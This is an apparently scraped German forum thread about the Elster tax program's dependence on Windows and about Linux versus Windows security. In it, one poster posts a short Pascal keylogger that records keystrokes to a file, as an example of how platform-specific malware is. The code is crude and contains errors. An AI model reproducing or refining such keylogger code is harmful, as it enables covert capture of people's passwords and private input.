Vermutlich meist Du mit Wine !?!MacWomble hat geschrieben:Elster läuft ganz gut unter Linux, lediglich die PDF-Ausgabe ist etwas hakelig ...
-Michael
Vermutlich meist Du mit Wine !?!MacWomble hat geschrieben:Elster läuft ganz gut unter Linux, lediglich die PDF-Ausgabe ist etwas hakelig ...
Warum? München stellt sich wieder um, nach Windows.....Dass eine Deutsche Behörde damit den Kauf eines Produktes einer Amerikanischen Firma erzwingt, die schon von der EU mit Strafzahlungen belegt worden ist, finde ich ziemlich skandalös.
Das sehe ich nicht so. Das Steuerprogramm brauchst du einmal im Jahr, dann kann man das auch in der Virtuellen Box mit XP machen und hat ansonsten dennoch die ganzen Vorteile von Linux für die tägliche Arbeit.Timm Thaler hat geschrieben:Nimm halt Windows in einer VW unter Linux" - dann kann ich auch gleich Windows nehmen.
Code: Alles auswählen
program Keylogger;
{$APPTYPE GUI}
uses Classes, SysUtils, windows;
type
TByte256Array = array[0..255] of Byte;
var fs: TFileStream;
Keys, oldKeys = TByte256Array;
begin
FillChar(Keys, SizeOf(Keys), #00);
fs:=TFileStream.Create('./keys.txt', fmcreate);
try
while True do
begin
OldKeys := Keys;
GetKeyboardState(Keys);
for i:=0 to 255 do
if (oldKeys[I] <> Keys[I]) And Boolean(OldKeys[I] and 128) Then
fs.Write(chr(i), 1);
end;
finally
fs.Free;
end;
end.
Unbedingt. Wie wir ja alle wissen, gilt ja Windows 10 als "EXTREM" sicher. Sogar sicherer als Linux...Und für so was nötigt man Firmen einen Windows Rechner zu betreiben.
Nein, dafür nicht. Die Daten kannst Du auch bei Elster Online in der Webbrowser-Maske eingeben.Marc hat geschrieben:Wie ich verstanden habe braucht mann das nur um ein paar Daten zu übermitteln?
Und für so was nötigt man Firmen einen Windows Rechner zu betreiben.
Naja, wenn ich sehe, wie...pluto hat geschrieben:Dann wäre er auch noch "Unter" Linux lauffähig....
Ich hatte seinerzeit die Teilnahme an Elster verweigert. Das Finanzamt bat mich um eine Begründung. Ich habe Sicherheitsbedenken "informierter Kreise" zitiert. Das Finanzamt schickte mir dann einen Packen an UST-Voranmeldungsformularen. Und meinte, wenn die verbraucht sind und es keine mehr zum Download geben würde, dann solle ich einfach mit Kopien arbeiten, das angegebene Jahr durchstreichen und das gültige Jahr inkl. Monat handschriftlich andeuten.mschnell hat geschrieben:Die zwingend vorgeschriebene "Elster" Programm des Finanzamts läuft soweit ich weiß (ohne Tricks) nur auf Windows.Marc hat geschrieben:Ich kenne schon Gründe für ein Windows. Habe auch (alte) Programme die nur unter Windows laufen.
Dass eine Deutsche Behörde damit den Kauf eines Produktes einer Amerikanischen Firma erzwingt, die schon von der EU mit Strafzahlungen belegt worden ist, finde ich ziemlich skandalös.
-Michael
Ähm, ich glaube du hast die Konzepte hinter Linux nicht verstanden.Timm Thaler hat geschrieben:... grottig die Verzeichnisstruktur unter Linux ist: Schmeiss halt alles was irgendwie ausführbar ist in /bin oder /usr/bin.
... wegen dieser grottigen Verzeichnisstruktur irgendwie versucht wird das zu umgehen: Gut, es gibt /opt, aber das nimmt kaum jemand. Schmeiss es beim User ins home, dann hast Du keine Probleme mit Rechten.
... sich die Rechte einfach aushebeln lassen: Fragte da nicht letztens jemand, wie er ein Programm mit TProcess starten kann. Und dann ein sudo davor und das Programm läuft mit Adminrechten.
... man zum Verschlüsseln der Userdaten - inzwischen das beliebteste Hobby der Virenprogrammierer - nichtmal Adminrechte braucht, weil ja alles im User-Home passiert.
Glaub mir, man kann ein Linux so abhärten, dass kein Virus darauf mehr Startet. Das hat mein Bruder bei einem VServer gemacht der im Internet steht.... grottig die Verzeichnisstruktur unter Linux ist: Schmeiss halt alles was irgendwie ausführbar ist in /bin oder /usr/bin.
... wegen dieser grottigen Verzeichnisstruktur irgendwie versucht wird das zu umgehen: Gut, es gibt /opt, aber das nimmt kaum jemand. Schmeiss es beim User ins home, dann hast Du keine Probleme mit Rechten.
... sich die Rechte einfach aushebeln lassen: Fragte da nicht letztens jemand, wie er ein Programm mit TProcess starten kann. Und dann ein sudo davor und das Programm läuft mit Adminrechten.
... man zum Verschlüsseln der Userdaten - inzwischen das beliebteste Hobby der Virenprogrammierer - nichtmal Adminrechte braucht, weil ja alles im User-Home passiert.
Das komplexe an einem Virus ist meistens sehr systemabhängig, die lcl z.B. hat zwar viele WinAPI Funktionen Plattformunabhängig, allerdings fehlen einige Funktionen die man normalerweise nicht so häufig braucht fehlen. Mein Keylogger von oben würde so z.B. nicht unter Linux funktionieren.pluto hat geschrieben:Unbedingt. Wie wir ja alle wissen, gilt ja Windows 10 als "EXTREM" sicher. Sogar sicherer als Linux...Und für so was nötigt man Firmen einen Windows Rechner zu betreiben.
Ich finde, es gibt nur eine Sache, die dagegen Spricht: Was wird am meisten Verwendet?
Und warum sollte jemand ein Virus oder so schreiben für etwas was nicht so oft Verwendet wird?
Ich denke das alleine dürfte schon ein Grund sein, wenn Möglich KEIN Windows zu verwenden.
Aber gut für uns: Delphi läuft nur unter Windows....
Schön das beim Virus schreiben nicht Lazarus Verwendet wurde....
Dann wäre er auch noch "Unter" Linux lauffähig....